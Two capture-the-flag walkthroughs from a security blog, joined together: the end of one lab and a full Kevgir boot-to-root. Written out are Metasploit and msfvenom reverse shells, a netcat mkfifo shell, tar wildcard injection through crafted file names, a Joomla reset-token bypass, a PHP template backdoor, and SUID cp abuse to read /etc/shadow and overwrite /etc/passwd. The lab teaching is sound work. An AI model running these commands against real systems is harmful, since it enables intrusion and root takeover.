?![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-02hHielltsY/WuLLNfkMstI/AAAAAAAAWdg/qyxHuicFVI85i7IVCdQ-xTJyVc6eZfPxgCLcBGAs/s1600/7.png?w=687&ssl=1)
Before clicking on OK run Metasploit and type:
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
1
2
3
4
5
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
And when you click on ok you will have your meterpreter session. You can type the following command to get the information about the system:
sysinfo
1
sysinfo
Then check the list of the thing present in langman by typing :
ls
1
ls
There is only one folder available so let’s go into it.
cd SDINET
1
cd SDINET
ls (to check the contents of SDINET)
Here, in SDINET you will find a text file which will show you all the steps to move ahead. It contains Unix wildcard attacks.
[To see content please register here]
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-l9IPez0-_4o/WuLLN8DcNEI/AAAAAAAAWdk/PG_xpqEpe3k5nUgQ5YqAyGvcOUWMCLMRwCLcBGAs/s1600/8.png?w=687&ssl=1)
Some further digging revealed that crontab was running a backup script as root, which used tar to compress the contents of /var/www/html. One of the attacks mentioned in the text document covered tar. The commands we used are:
cat /etc/crontab
cat /backup/backup.sh
1
2
cat /etc/crontab
cat /backup/backup.sh
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-cSOXChg_E64/WuLLOABvkuI/AAAAAAAAWdo/xllIM20lPVkRsnLP5cvNPGeww_5ltlR9QCLcBGAs/s1600/9.png?w=687&ssl=1)
On a new terminal generate one-liner malicious code for achieving netcat reverse connection using msfvenom and enter the following command for that.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=8888 R
1
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=8888 R
After that copy and paste the generated code inside the meterpreter session as described below and start netcat.
nc -lvp 8888
1
nc -lvp 8888
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-8Z2SU5-yHB0/WuLLLMBb_FI/AAAAAAAAWdA/bN52y7EwgogNhssBOI-svpLJ-x9r2L0dwCLcBGAs/s1600/12.png?w=687&ssl=1)
From inside DefenseCode_Unix_WildCards_Gone_Wild.txt, it has a section about how to get a command execution using the tar command
Next, we ran the following commands inside the meterpreter session:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
echo "mkfifo /tmp/ivkwne; nc 192.168.1.108 8888 0</tmp/ivkwne | /bin/sh >/tmp/ivkwne 2>&1; rm /tmp/ivkwne" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
1
2
3
4
5
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
echo "mkfifo /tmp/ivkwne; nc 192.168.1.108 8888 0</tmp/ivkwne | /bin/sh >/tmp/ivkwne 2>&1; rm /tmp/ivkwne" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-nUpmFTRcA0I/WuLLLUNXXXI/AAAAAAAAWdE/yO8Od-rDU_cvbtPheG1uurPMCrTB0lFRQCLcBGAs/s1600/14.png?w=687&ssl=1)
The above commands help the tar command to run the file, shell.sh after the first file is archived. Since the backup.sh script is running as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 8888.
And if you go back to the terminal window where the listener was on, you will have victim’s reverse connection in some time, after that type following command to import python one-liner script for accessing proper tty shell.
python -c 'import pty;pty.spawn("/bin/bash")'
1
python -c 'import pty;pty.spawn("/bin/bash")'
And you will root access, further move into the/root directory and grab the credit.txt file and finished this challenge.
HAPPPPPYYYY HACKIIIIING!!!!!!
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-pil06xkr54k/WuLLLyEOHFI/AAAAAAAAWdI/2eld6TFEecMySpgv8LjvdYkk379qM9VgACLcBGAs/s1600/15.png?w=687&ssl=1)
In this article, we will walkthrough a root2boot penetration testing challenge i.e Kevgir. Kevgir is a vulnerable framework, based on the concept of CTF(Capture The Flag). This lab can be solved in multiple ways, one of them is used in this article.
Penetrating Methodologies
- Network Scanning (Nmap, netdiscover)
- Joomla based CMS Scanning CMS (Joomscan)
- Exploiting target (exploit 6234)
- Login into the admin console
- Generate PHP Backdoor (Msfvenom)
- Upload and execute a backdoor
- Reverse connection (Metasploit)
- Import python one-liner for proper TTY shell
- Find SUID Binaries for Privilege Escalation
- Abusing shadow & password file
- Get Root access and capture the flag.
First Download Kevgir Vm From
[To see content please register here]
Start off with finding the target using :
netdiscover
1
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Q0SwTWaB4cM/WxeHpeVve_I/AAAAAAAAXLA/EMNrfgxUD8wk52pRQDawS0QkMGpG5AaGwCLcBGAs/s1600/1.png?w=687&ssl=1)
Our target is 192.168.1.102 Now scan the target with nmap :
nmap -p- -A 192.168.1.102
1
nmap -p- -A 192.168.1.102
With the nmap scan, you can see the ports 80, 139, 2049, 6379, 8080, 8081, 9000, 40383 and many others are open as you can see in the image.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-39Qq8Mpe3us/WxeHsKF3K3I/AAAAAAAAXLw/myImctqG6Y04cRBOSX3A092ctDylbXupQCLcBGAs/s1600/2.png?w=687&ssl=1)
Also, if you observe then you can see port forwarding is used here e.g. HTTP service is open on port number 80, 8080 and 8081. So, let us try open our target on 80 and 8081 port.
On port 80 Our target opens as the following:
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-NPGNHm6B0NI/WxeHsoNTV3I/AAAAAAAAXL4/Uvz_CRgiJUYGRgVtl5N1xP5xpJ8zm7bXwCLcBGAs/s1600/3.png?w=687&ssl=1)
And on port 8081 opens on :
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-SkgHPMzhwpU/WxeHstUckbI/AAAAAAAAXL8/06kboLrDDdwO_Qo1A2uHegWgi660IZbOwCLcBGAs/s1600/4.png?w=687&ssl=1)
The cms of the website are Joomla and this version of Joomla, as everyone knows, is exploitable. We will scan the said target with joomscan :
joomscan -u
[To see content please register here]
1
joomscan -u
[To see content please register here]
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-rtj-KwyIfuY/WxeHsw9rtcI/AAAAAAAAXMA/R8t5BKS8VyoYrVCoVf3VLUhIXHS_y_6zgCLcBGAs/s1600/5.png?w=687&ssl=1)
Applying the joomscan will show all the vulnerable exploits. Here we can observe the highlighted text pointing towards “Admin Password changed” seems to be vulnerable against exploit 6234. Now if you look closely the exploit number 6234 will show you the steps to exploit the certain vulnerability.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-ZkmfsfFdkBs/WxeHtTkTS_I/AAAAAAAAXMM/qRlkkbrCnvUGXS4vDwXIKfUdX4FqftHTQCLcBGAs/s1600/6.png?w=687&ssl=1)
According to the said, go for exploring the following URL:
192.168.1.102:8081/index.php?optiona=com_user&view=reset&layout=confirm
1
192.168.1.102:8081/index.php?optiona=com_user&view=reset&layout=confirm
Here, it will ask you for the token, type an apostrophe (‘) in the token adjacent text box.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-bZcncyuqZ6Y/WxeHtPNZtkI/AAAAAAAAXME/O4hVpO0SxaMVS6IAQ5bIxLLv6tDVjBsLQCLcBGAs/s1600/7.png?w=687&ssl=1)
It will redirect you to a page where it will ask you to set up a new password.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-AADrR2pb-N0/WxeHtW5iQJI/AAAAAAAAXMI/tsye8PaN3cUs4H-eInWnT501kE2qXRTkACLcBGAs/s1600/8.png?w=687&ssl=1)
After setting up the new password, login with the username and the password that you had just set.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-mW3GayBtWcQ/WxeHtuVPM5I/AAAAAAAAXMQ/1WDZF2yKMRk6PidG1QN-3jIVTy-vWKQNgCLcBGAs/s1600/9.png?w=687&ssl=1)
Now that you are logged in, go to the Extensions menu and select Template Manager from the drop-down menu.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-Hx8PTiywxy0/WxeHplYmYnI/AAAAAAAAXLI/K911H2-Kr14KKih_EjcVaprpG3t2_hzTQCLcBGAs/s1600/10.png?w=687&ssl=1)
Then choose Extensions > Template Manager > rhuk_milkway > Edit HTML.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-NyB_90BCH98/WxeHqMICMwI/AAAAAAAAXLM/hUq8zGsN7AYKE-e5nBwTVgSt-kIxzsMAgCLcBGAs/s1600/12.png?w=687&ssl=1)
Inside this, we can add our own PHP code but instead of editing genuine PHP for new template we will add malicious PHP code.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-ja7biDweoo0/WxeHqSCGXDI/AAAAAAAAXLQ/QqmIoBPD_pwp_oI-d3A9D0mJy8BGLSJLwCLcBGAs/s1600/13.png?w=687&ssl=1)
Create the malicious code that you are going to upload via msfvenom.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
On the other hand run multi/handler inside the Metasploit framework
![[Image: 14.1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-g6dRvzj_0RI/WxeONdo3RaI/AAAAAAAAXMw/uuRu0Ys6kLkn0tQvJ7JVR767S4qHelypQCLcBGAs/s1600/14.1.png?w=687&ssl=1)
Copy the code from >?php to die(); and Paste the code inside HTML editor and click on save button.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-5zyx3zTSrPY/WxeOZIKEZfI/AAAAAAAAXNQ/98Il_uzjgngfjibyi-_tVLwPrcBcgr-fQCLcBGAs/s1600/14.png?w=687&ssl=1)
Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
1
2
3
4
5
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
From given below image you can observe Meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.
meterpreter > sysinfo
meterpreter > shell
1
2
meterpreter > sysinfo
meterpreter > shell
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-6pF9guvepCI/WxeOTpdYCuI/AAAAAAAAXM0/qGIsYgXOPGwJO-oUETPAwGm03U-7hXguACLcBGAs/s1600/15.png?w=687&ssl=1)
Then to access proper TTY shell we had import python one line script by typing following:
python -c 'import pty;pty.spawn("/bin/bash")'
1
python -c 'import pty;pty.spawn("/bin/bash")'
Now for privilege escalation either we can use find command to enumerate enabled SUID bit for any system binaries or we move into the etc/bin to enumerate enabled SUID bit any binaries file.
find / -perm -u=s -type f 2>/dev/null
or
cd /etc/bin
ls -al
1
2
3
4
find / -perm -u=s -type f 2>/dev/null
or
cd /etc/bin
ls -al
Hence we can clearly observe the SUID bit is set for cp for copy command, to copy any file which required higher privilege to perform read/write operation upon them such as etc/passwd & etc/shadow files.
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-xZZmLM9q4d8/WxeOT7z2F7I/AAAAAAAAXM8/NoGc96Oi-oMx59nTYyALhWgDUp42OvrvACLcBGAs/s1600/16.png?w=687&ssl=1)
Therefore we copied etc/shadow inside tmp and open it inside /tmp directory. The shadow files hold encrypted password of users and we are have copied the hash password for user: admin as shown.
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-zy5EvH3Aw0U/WxeOTsFWeRI/AAAAAAAAXM4/bKo4dXrpU8o_21gWf-4Mn5q8OWBUfGXYwCLcBGAs/s1600/17.png?w=687&ssl=1)
Now we have pasted the above-copied text in an empty document and used John the ripper for cracking this hash value. As result, you can observe the password: admin for user: admin. This method is known as SUID binaries privilege escalation, for more detail read this
[To see content please register here]
.![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-Fhy0YJ96Ch0/WxeOUE6qmJI/AAAAAAAAXNA/e1v8GVKYDuIFE67k2R2KgxZdNrNAFQu0QCLcBGAs/s1600/18.png?w=687&ssl=1)
But the task is not completed yet, this boot to root challenge and still, we are lacking root privilege. Now open the password file with help of cat where you will find an entry for admin. Now we know the admin user’s password and by manipulating his entries, we can increase his privileges and do so copy the whole content of this file.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-7_zalmE1IKQ/WxeOUdtwaDI/AAAAAAAAXNE/ADFcmOvXRo8CFgAeWr-Ss41T1pdIFuVaQCLcBGAs/s1600/19.png?w=687&ssl=1)
Paste it into an empty text file, now modify UID: 1002 & GID: 1002 into UID: 0 & GID: 0 for adding admin into root group member and saved as passwd so that we can replace original passwd file from our modified passwd file.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-BNeZ5KrnglA/WxeOU-QymhI/AAAAAAAAXNI/SmxIBgilBiwwasyEc1-1eTjaI0fXQIzBQCLcBGAs/s1600/20.png?w=687&ssl=1)
Download the modified password file inside /tmp directory with help of wget as shown.
wget
[To see content please register here]
1
wget
[To see content please register here]
Now replace the content of the original passwd file from our modified passwd file with help of copy command and it is possible due to SUID bit which is enabled for /bin/cp file. After then switch user with help of su command and you will get root access after that as shown below.
cp passwd /etc/
su admin
1
2
cp passwd /etc/
su admin
![[Image: 21.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-yl67VfDxbNs/WxeOU5qUVZI/AAAAAAAAXNM/qeA-cDIOnzAxJV1yl3H2H-kbZ6ctEwTagCLcBGAs/s1600/21.png?w=687&ssl=1)
HURRAYYYY!!! We hit the Goal and finish this task. But this lab can be solved in multiple ways for example use kernel privilege escalation for privilege escalation.
Try it by yourself and enjoy the CTF challenges!!













